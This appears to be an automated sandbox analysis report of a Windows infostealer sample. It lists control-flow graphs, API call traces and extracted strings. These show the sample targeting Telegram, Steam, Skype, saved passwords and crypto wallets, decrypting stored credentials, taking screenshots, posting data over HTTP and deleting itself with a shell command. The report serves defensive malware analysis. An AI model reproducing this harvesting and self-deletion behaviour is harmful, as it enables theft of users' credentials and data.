                    • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 00417BE9
                    • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BEF
                    • LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 00417C03
                    • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C09
                    • LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417C1D
                    • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C23
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
                    • API String ID: 2574300362-2815069134
                    • Opcode ID: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
                    • Instruction ID: 8590a6e993e3993f4c60c6cfae4e59332f73d92cf5cac50a27a19d2551d8218b
                    • Opcode Fuzzy Hash: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
                    • Instruction Fuzzy Hash: 3911D0F17C430069DA0177B2DD8BAE635B4BBC1B4A730447B7104722D2E97C888196DD

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 786 438763-438828 LoadLibraryA CreateToolhelp32Snapshot Module32FirstW 789 438830-438834 786->789 790 43882a-43882b call 4381a5 786->790 790->789
                    APIs
                    • LoadLibraryA.KERNEL32(00441AD0), ref: 00438775
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00438812
                    • Module32FirstW.KERNEL32(00000000,?), ref: 00438820
                      • Part of subcall function 004381A5: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004381D5
                      • Part of subcall function 004381A5: GetTickCount.KERNEL32 ref: 00438501
                      • Part of subcall function 004381A5: GetSystemTimes.KERNEL32(?,?,?), ref: 00438540
                      • Part of subcall function 004381A5: GetCPInfo.KERNEL32(00000000,?), ref: 0043854E
                      • Part of subcall function 004381A5: GlobalMemoryStatus.KERNEL32(?), ref: 0043855B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908458496.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_420000_8p5iD52knN.jbxd
                    Similarity
                    • API ID: CountCreateFirstGlobalInfoLibraryLoadMemoryMessageModule32PeekSnapshotStatusSystemTickTimesToolhelp32
                    • String ID:
                    • API String ID: 742628225-0
                    • Opcode ID: 650fdbf8769d7dbd00ceb9c96eeafe9786b102405424d85ce780cdde091103ab
                    • Instruction ID: ef4b522a7121729634f5e3c248a88c262e1800d241b3cbe006ab8058dcbe68de
                    • Opcode Fuzzy Hash: 650fdbf8769d7dbd00ceb9c96eeafe9786b102405424d85ce780cdde091103ab
                    • Instruction Fuzzy Hash: 51114228949381E9E306A779AC09B063E987317348F0601FED4A4562B2D7FE1519D76F
                    APIs
                    • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
                    • Instruction ID: 82fb6e080fc5b909ee9ff94d6b2e2f71dc3c30d6621c9439b15b03eb027989ab
                    • Opcode Fuzzy Hash: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
                    • Instruction Fuzzy Hash: 10E086712042025BD310EB58DC81A9A76D89B84315F00483EBC45D73D2EE3DDE589756

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 72 419108-41910b 73 419110-419115 72->73 73->73 74 419117-4191a8 call 403980 call 4034e4 call 40357c call 40561c call 407d24 call 406c4c call 403798 call 403990 CreateMutexA 73->74 92 419f30-41a139 call 4034e4 call 403b98 call 4034e4 call 403b98 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b98 call 4034e4 call 403b98 call 4034e4 call 403b98 call 4034e4 call 403b98 call 4034e4 call 403b98 call 403508 call 404224 call 403508 call 4034e4 * 2 call 403508 * 2 call 4034e4 74->92 93 4191ae-4191bb call 4034e4 74->93 99 4191c0-4191c3 93->99 101 4191c5-4191e2 call 4036cc call 403798 99->101 102 4191e4-419237 call 418f9c call 406c4c call 406810 call 4037dc call 4176d8 call 418688 99->102 101->99 101->102 129 41923c-419259 call 4176d8 call 403790 102->129 129->92 140 41925f-41926c call 4038dc 129->140 140->92 146 419272-419321 call 407428 call 406984 call 407428 call 406ae4 call 40795c call 407428 call 406984 call 4080c4 call 408328 call 40dc44 call 4045ec 140->146 191 419327-419328 146->191 192 419909-419c2e call 417290 call 403850 call 40dce8 call 406c4c call 406810 call 407a4c call 406810 call 406bb4 call 40377c call 406810 call 4066c0 call 40377c call 406810 call 406610 call 40377c call 406810 call 4065cc call 40377c call 406810 call 406fdc call 40377c call 406810 call 406fdc call 40377c call 406810 call 406fdc call 40377c call 406810 call 406fdc call 40377c call 406810 * 2 call 407d24 call 406810 call 403850 call 403798 call 4063a4 call 40653c call 40dee4 call 403850 146->192 194 41932a-419338 call 403790 191->194 469 419c30-419c54 call 403850 call 403798 192->469 470 419c59-419ca1 call 4176d8 call 418688 call 4050c8 call 403790 192->470 205 419901-419903 194->205 206 41933e-419340 194->206 205->192 205->194 209 419492-41949b 206->209 210 419346-419350 206->210 213 4194a1-4194d0 call 40795c call 40357c call 403a78 209->213 214 419825-41982e 209->214 215 419372-41937c 210->215 216 419352-41936d call 40d7f0 call 4053d8 call 40dce8 210->216 278 419742-419820 call 403d2c * 2 call 407048 call 4038dc * 2 call 403850 call 403d2c * 2 call 4037dc call 403d2c call 414408 213->278 279 4194d6-419503 call 407428 213->279 222 419830-419846 call 403850 214->222 223 41984b-419854 214->223 217 4193b1-4193bb 215->217 218 41937e-4193ac call 414028 call 408120 call 405528 call 40dce8 215->218 216->215 230 4193c2-4193cc 217->230 231 4193bd call 414098 217->231 218->217 222->223 223->205 232 41985a-41987d call 40795c call 4038dc 223->232 240 4193ec-4193f6 230->240 241 4193ce-4193e0 call 415ea8 230->241 231->230 271 4198f1-4198fc call 40dce8 232->271 272 41987f-4198ef call 418688 call 407428 * 2 call 403850 call 40dce8 232->272 243 419402-41940c 240->243 244 4193f8-4193fd call 414cb8 240->244 241->240 262 4193e2-4193e7 call 4050c8 241->262 256 41942f-419439 243->256 257 41940e-41942a call 414408 243->257 244->243 266 419445-41944f 256->266 267 41943b-419440 call 414f40 256->267 257->256 262->240 280 419451-41947d GetSystemMetrics * 2 call 4178b4 call 40dce8 266->280 281 419482-41948c 266->281 267->266 271->205 272->205 278->214 279->92 308 419509-41950f 279->308 280->281 281->209 284 41948e 281->284 284->209 314 419734-419737 308->314 317 419514-41954a call 406fdc call 40377c call 403a78 314->317 318 41973d 314->318 358 419731 317->358 359 419550-41972c call 403c98 call 403850 call 403d2c * 2 call 4070bc call 40377c call 4034e4 call 403850 call 403d2c call 4070bc call 403d58 call 40377c call 403d2c call 40781c call 40377c call 403d2c * 2 call 407048 call 4038dc * 2 call 4037dc call 403d2c * 2 call 4037dc call 403d2c call 414408 317->359 318->214 358->314 359->358 469->470 483 419db1-419dd1 call 4087dc call 407d24 call 4038dc 470->483 484 419ca7-419cc4 call 40795c call 4045ec 470->484 498 419dd3-419de0 call 4038dc 483->498 499 419dec-419df9 call 4038dc 483->499 484->483 493 419cca-419ccb 484->493 495 419ccd-419d03 call 4047a8 call 40795c call 4045ec 493->495 516 419da9-419dab 495->516 517 419d09-419d18 call 4038dc 495->517 498->499 508 419de2-419de7 call 407dd4 498->508 499->92 506 419dff-419e03 499->506 506->92 509 419e09-419f2b call 4028e0 call 4062d8 call 403d3c call 4062d8 call 402754 call 403d2c call 40770c call 403e1c call 403d3c call 402754 call 403d2c call 407798 call 403d3c ExitProcess 506->509 508->92 516->483 516->495 517->516 523 419d1e-419d42 call 40795c call 4045ec 517->523 532 419d85-419d89 523->532 533 419d44-419d45 523->533 532->516 536 419d8b-419da4 call 4038dc call 418cf4 532->536 535 419d4c-419d7d call 406318 call 403a78 533->535 535->532 550 419d7f-419d83 535->550 536->516 550->532 550->535
                    APIs
                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00419195
                      • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                      • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                    • GetSystemMetrics.USER32(00000001), ref: 00419460
                    • GetSystemMetrics.USER32(00000000), ref: 00419468
                    • ExitProcess.KERNEL32(00000000), ref: 00419F2B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$DirectoryMetricsSystem$ExitMutexProcess
                    • String ID: "countryCode":"$"query":"$%DSK_$%appdata%\Telegram Desktop\tdata\$%comspec%$/c %WINDIR%\system32\timeout.exe 3 & del "$0_@$<$</c>$</d>$</n>$<c>$<d>$<n>$Coins$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$Telegram$exit$http://ip-api.com/json$image/jpeg$ip.txt$scr.jpg
                    • API String ID: 447519224-805684967
                    • Opcode ID: bc2d9aa0ce9f509a8af9cfcef76fe04711796da2ad7deb0f793843fff6f3637b
                    • Instruction ID: 8e865d1d98f6c8efaf34d3e531d58462b667ba857a61b59ff422c1b99a10b1ba
                    • Opcode Fuzzy Hash: bc2d9aa0ce9f509a8af9cfcef76fe04711796da2ad7deb0f793843fff6f3637b
                    • Instruction Fuzzy Hash: 4F920E34A0011D9FDB11EB55C885BCDB7B9AF49308F5081BBE408B7292DB38AF958F59

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 562 418688-41868c 563 418691-418696 562->563 563->563 564 418698-4186d8 call 403980 * 3 563->564 571 4186e7-41871d call 4034e4 call 40357c * 2 call 4039e8 GetModuleHandleA 564->571 572 4186da-4186e2 call 40357c 564->572 582 41872f-418731 571->582 583 41871f-41872d call 4039e8 LoadLibraryA 571->583 572->571 585 418733-41874d call 4039e8 * 2 LoadLibraryA 582->585 586 41874f-418934 call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 404f00 * 7 call 403790 call 403990 InternetCrackUrlA call 4036dc call 403790 call 4039f0 call 403a78 582->586 583->582 585->586 636 418977-41898b InternetOpenA 586->636 637 418936-418974 call 4036dc call 4037dc call 417f6c call 403990 586->637 638 418991-4189ce InternetConnectA 636->638 639 418adc-418ae3 636->639 637->636 655 4189d4-4189fb call 4036dc call 403a78 638->655 656 418ad6-418ad9 638->656 645 418ae5-418b23 call 4036dc * 2 call 418124 639->645 646 418b28-418b7f call 403538 call 4034e4 call 403508 * 4 639->646 645->646 670 418a04-418a2b call 403990 HttpOpenRequestA 655->670 671 4189fd 655->671 656->639 677 418a31-418a35 670->677 678 418ad0-418ad4 InternetCloseHandle 670->678 671->670 680 418a55-418a77 call 403790 call 403990 HttpSendRequestA 677->680 681 418a37-418a51 call 403790 call 403990 677->681 678->656 680->678 693 418a79-418ac8 call 404f00 call 4035d4 call 403798 680->693 681->680 693->678 701 418aca-418ace 693->701 701->678 701->693
                    APIs
                    • GetModuleHandleA.KERNEL32(00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418714
                    • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418728
                    • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418748
                    • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 0041875C
                    • GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00418771
                    • GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00418786
                    • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041879B
                    • GetProcAddress.KERNEL32(00000000,-00000053), ref: 004187B0
                    • GetProcAddress.KERNEL32(00000000,-00000064), ref: 004187C5
                    • GetProcAddress.KERNEL32(00000000,-00000075), ref: 004187DA
                    • GetProcAddress.KERNEL32(00000000,-00000089), ref: 004187F0
                    • GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00418807
                    • InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 004188F3
                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C), ref: 00418984
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 004189C4
                    • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 00418A21
                    • HttpSendRequestA.WININET(00000000,00418CB8,00000000,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A72
                    • InternetCloseHandle.WININET(00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418AD4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Internet$HandleHttpLibraryLoadOpenRequest$CloseConnectCrackModuleSend
                    • String ID: .bit$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
                    • API String ID: 3386017226-2879170074
                    • Opcode ID: 6429366c6769f625a15f2e8b34452719443efabef2c4d045cb4197efb996f934
                    • Instruction ID: 76fb72323b8ae20ff65678eff3f65f90e6b3cd7dcd45201054b3a4b47af70050
                    • Opcode Fuzzy Hash: 6429366c6769f625a15f2e8b34452719443efabef2c4d045cb4197efb996f934
                    • Instruction Fuzzy Hash: 8AE1EAB1910219ABDB10EFA5CC86BDEBBBCBF44305F10417AF504B6681DB78AA458B58

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 702 61fdb4-61fdbf 703 61fdc1 702->703 704 61fdc4-61ffdb call 6207b7 call 620b70 call 620b08 VirtualAlloc 702->704 703->704 719 620003-62000a 704->719 720 61ffdd-620001 call 6207e1 704->720 722 620019-620028 719->722 724 620046-62013a VirtualProtect call 620a46 call 620a5f 720->724 722->724 725 62002a-620044 722->725 731 620149-620158 724->731 725->722 732 6201b1-620230 VirtualFree 731->732 733 62015a-6201af call 620a5f 731->733 735 620236-620245 732->735 736 62036c-620376 732->736 733->731 738 62024b-620255 735->738 739 6204f7-620501 736->739 740 62037c-620385 736->740 738->736 743 62025b-62027d LoadLibraryA 738->743 744 620503-62051b 739->744 745 62051e-620528 739->745 740->739 742 62038b-6203af 740->742 746 62028f-620298 743->746 747 62027f-62028d 743->747 744->745 748 6205e6-620636 LoadLibraryA 745->748 749 62052e-620543 745->749 750 62029e-6202bf 746->750 747->750 754 62063f-620671 748->754 751 62054a-62054d 749->751 755 6202c5-6202c8 750->755 752 62054f-620558 751->752 753 62059c-6205ab 751->753 756 62055a 752->756 757 62055c-62059a 752->757 758 6205b1-6205b4 753->758 759 620673-620679 754->759 760 62067a-620695 754->760 761 620358-620367 755->761 762 6202ce-6202e3 755->762 756->753 757->751 758->748 763 6205b6-6205bf 758->763 759->760 761->738 764 6202e7-6202f2 762->764 765 6202e5 762->765 766 6205c3-6205e4 763->766 767 6205c1 763->767 768 620313-620333 764->768 769 6202f4-620311 764->769 765->761 766->758 767->748 772 620335-620353 768->772 769->772 772->755
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0061FFC5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_61f000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: 1d3f1b4fa1104d12923b2607602187910ab13e8cafb3ea4eab99c5b4f5fef507
                    • Instruction ID: 20c942b14a7887e1165a2399999d9af83e66756eebf741003cc18f0dd6365a57
                    • Opcode Fuzzy Hash: 1d3f1b4fa1104d12923b2607602187910ab13e8cafb3ea4eab99c5b4f5fef507
                    • Instruction Fuzzy Hash: 0A127A75A01228DFDBA4CF98D885B9CBBB1BF09304F1480D9E54DAB352DB30AA85DF15

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 775 40955e-409567 776 409583 775->776 777 409569-40957e LoadLibraryA GetProcAddress 775->777 777->776
                    APIs
                    • LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 00409573
                    • GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 00409579
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: CryptUnprotectData$crypt32.dll
                    • API String ID: 2574300362-1827663648
                    • Opcode ID: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
                    • Instruction ID: 1936ed15528034ef1a8706b88be01f12f22861c51f7a066308f0a1848fab801f
                    • Opcode Fuzzy Hash: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
                    • Instruction Fuzzy Hash: 89C04CF368030376CF466B779D4A5462294B7C1B1D760493BF511B11D2D6BC8D404F5D

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 778 407c58-407ca2 780 407ca4-407cf0 LookupAccountSidA CheckTokenMembership 778->780 781 407d1d-407d23 778->781 782 407cf2-407cf7 780->782 783 407cf9-407cfc 780->783 784 407cff-407d15 FreeSid 782->784 783->784
                    APIs
                    • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407D16), ref: 00407CD9
                    • CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407CEC
                    • FreeSid.ADVAPI32(00000000,00407D1D), ref: 00407D10
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AccountCheckFreeLookupMembershipToken
                    • String ID:
                    • API String ID: 1602037265-0
                    • Opcode ID: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
                    • Instruction ID: 099d520652cb879bdf47a43f009fc20e3076d83f6f5b891ba4a5cda1263a2b72
                    • Opcode Fuzzy Hash: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
                    • Instruction Fuzzy Hash: 7821A475A04209AFDB41CFA8DC51FEEB7F8EB48700F104466EA14E7290E775AA01DBA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 792 6203e4-6203ec 793 6203f2-620401 792->793 794 620407-62042a 793->794 795 6204c8-6204f2 793->795 796 620467-620474 794->796 797 62042c-620465 794->797 799 6203c6-6203d2 795->799 800 6204f7-620501 795->800 801 6204c3 796->801 802 620476-6204c0 796->802 797->796 799->800 803 6203d8-6203e2 799->803 804 620503-62051b 800->804 805 62051e-620528 800->805 801->792 802->801 803->793 804->805 806 6205e6-620636 LoadLibraryA 805->806 807 62052e-620543 805->807 811 62063f-620671 806->811 808 62054a-62054d 807->808 809 62054f-620558 808->809 810 62059c-6205ab 808->810 812 62055a 809->812 813 62055c-62059a 809->813 814 6205b1-6205b4 810->814 815 620673-620679 811->815 816 62067a-620695 811->816 812->810 813->808 814->806 817 6205b6-6205bf 814->817 815->816 818 6205c3-6205e4 817->818 819 6205c1 817->819 818->814 819->806
                    APIs
                    • LoadLibraryA.KERNEL32(msvcr100.dll), ref: 00620612
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_61f000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID: msvcr100.dll
                    • API String ID: 1029625771-4078232268
                    • Opcode ID: d62b7385236eb3342a17d9e4d87b611e39e3cf254c0d8c16f175d63fcb1c783e
                    • Instruction ID: 9987bc236bc94fb179c834a473e6f8c0a052564b966cd18ec913c36cd583f586
                    • Opcode Fuzzy Hash: d62b7385236eb3342a17d9e4d87b611e39e3cf254c0d8c16f175d63fcb1c783e
                    • Instruction Fuzzy Hash: 42917174A0026ACFDB64CF58C984BA8B7B1AF09304F1581E9E50DA7752DB34AEC5DF14

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 822 4040f4-4040f8 823 404112 822->823 824 4040fa-40410a SysAllocStringLen 822->824 825 403b50 824->825 826 404110 824->826 825->822 826->823
                    APIs
                    • SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                    Strings
                    • SOFTWARE\Microsoft\Cryptography, xrefs: 00404101
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocString
                    • String ID: SOFTWARE\Microsoft\Cryptography
                    • API String ID: 2525500382-1514646153
                    • Opcode ID: 6827334effe1af4081dab58951797ab719276b71555c5be752b1280ab307ebe8
                    • Instruction ID: 809722c095ea45080b132ee1ecccaea0ad8e4e48b5b2181e80121cad3d0a43f6
                    • Opcode Fuzzy Hash: 6827334effe1af4081dab58951797ab719276b71555c5be752b1280ab307ebe8
                    • Instruction Fuzzy Hash: E6D012F42001025AD7489F198555A37776E5BD1700368C6BEA101BF2D5DB39E841EB34

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                    • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582
                    • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocOpenQueryStringValue
                    • String ID:
                    • API String ID: 4139485348-0
                    • Opcode ID: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
                    • Instruction ID: a534eb6d79e9af16e12b264bd48d331209bfd9d9316274433d90d6d6e5d4440a
                    • Opcode Fuzzy Hash: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
                    • Instruction Fuzzy Hash: 1921C771A04109AFD700EB99CD81EEEBBFCEB48304F504576B904E7691D774AE448A65

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 848 4033f4-40340b 849 403423-40342a 848->849 850 40340d-403410 848->850 852 40342c-403438 call 4032dc call 403368 849->852 853 40343d-403441 849->853 850->849 851 403412-403421 850->851 851->849 852->853 855 403443-403446 853->855 856 40344d-403456 call 4031dc 853->856 855->856 859 403448-40344a 855->859 864 403458-40345b 856->864 865 40345d-403462 856->865 859->856 864->865 866 40347e-403487 call 4031b4 864->866 865->866 867 403464-403472 call 404890 865->867 873 403489 866->873 874 40348c-403490 866->874 867->866 872 403474-403476 867->872 872->866 875 403478-403479 FreeLibrary 872->875 873->874 876 403492 call 403338 874->876 877 403497-40349a 874->877 875->866 876->877 879 4034b3 877->879 880 40349c-4034a3 877->880 881 4034a5 880->881 882 4034ab-4034ae ExitProcess 880->882 881->882
                    APIs
                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitFreeLibraryProcess
                    • String ID:
                    • API String ID: 1404682716-0
                    • Opcode ID: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
                    • Instruction ID: 759013028fc8479fd2dc72d2fd20690e0ff356ad8f398ebd0a8dd26c183a4070
                    • Opcode Fuzzy Hash: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
                    • Instruction Fuzzy Hash: 532162709002408BDB229F6584847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 883 4033ec-40340b 885 403423-40342a 883->885 886 40340d-403410 883->886 888 40342c-403438 call 4032dc call 403368 885->888 889 40343d-403441 885->889 886->885 887 403412-403421 886->887 887->885 888->889 891 403443-403446 889->891 892 40344d-403456 call 4031dc 889->892 891->892 895 403448-40344a 891->895 900 403458-40345b 892->900 901 40345d-403462 892->901 895->892 900->901 902 40347e-403487 call 4031b4 900->902 901->902 903 403464-403472 call 404890 901->903 909 403489 902->909 910 40348c-403490 902->910 903->902 908 403474-403476 903->908 908->902 911 403478-403479 FreeLibrary 908->911 909->910 912 403492 call 403338 910->912 913 403497-40349a 910->913 911->902 912->913 915 4034b3 913->915 916 40349c-4034a3 913->916 917 4034a5 916->917 918 4034ab-4034ae ExitProcess 916->918 917->918
                    APIs
                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                    Memory Dump Source
